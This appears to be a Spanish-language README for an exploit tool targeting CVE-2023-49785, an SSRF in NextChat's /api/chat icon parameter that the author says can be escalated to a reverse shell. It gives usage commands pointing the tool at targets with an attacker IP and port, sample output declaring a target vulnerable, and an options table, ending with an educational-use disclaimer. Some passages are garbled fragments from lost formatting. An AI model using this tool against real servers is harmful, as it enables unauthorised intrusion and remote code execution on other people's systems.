
# Exploit para CVE-2023-49785
# NextChat SSRF a RCE
# Uso: python3 exploit.py <objetivo> <tu_ip> <tu_puerto> [--proxy PROXY] [--only-ssrf] [--verbose]
Este exploit aprovecha CVE-2023-49785, una vulnerabilidad de Server-Side Request Forgery (SSRF) en NextChat (ChatGPT-Next-Web) que permite a un atacante no autenticado enviar solicitudes HTTP arbitrarias desde el servidor mediante el parámetro icon del punto final /api/chat. Bajo ciertas condiciones, esto puede derivar en ejecución remota de código (RCE) mediante el acceso a servicios internos, cabeceras de metadatos o endpoints de administración.
/api/chat--only-ssrf para pruebas de validación--verbosepip install requests
python3 exploit.py http://objetivo.local 10.10.14.5 4444 --only-ssrf
python3 exploit.py http://objetivo.local 10.10.14.5 4444 --verbose
python3 exploit.py http://objetivo.local 10.10.14.5 4444 --proxy http://127.0.0.1:8080
python3 exploit.py https://chat.ejemplo.com 10.10.14.5 4444
icon de la solicitud a /api/chat. El servidor procesa esta URL y realiza la solicitud en nombre del atacante.http://127.0.0.1:8080) para identificar endpoints vulnerables.tu_ip:tu_puerto.$ python3 exploit.py http://chat.ejemplo.com 10.10.14.5 4444 --only-ssrf
[+] Objetivo: http://chat.ejemplo.com
[+] Probando respuesta del objetivo...
[+] El objetivo está activo
[+] Enviando payload SSRF a http://chat.ejemplo.com/api/chat
[+] Estado de la respuesta: 200
[+] Posible SSRF detectado: la respuesta incluye datos del servicio interno.
[+] Prueba completada. El objetivo es vulnerable a SSRF.
2.12.4).icon.Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso indebido de esta herramienta contra sistemas sin permiso explícito puede ser ilegal. El autor no se hace responsable del mal uso de la misma.
| Parámetro | Descripción |
|---|
objetivo | URL del NextChat vulnerable (ej. http://chat.ejemplo.com) |
tu_ip | Tu IP para el reverse shell |
tu_puerto | Tu puerto para el reverse shell |
--proxy PROXY | Proxy a utilizar (ej. http://127.0.0.1:8080) |
--only-ssrf | Ejecutar únicamente la validación de SSRF (sin RCE) |
--verbose | Mostrar salida detallada con las respuestas de las solicitudes |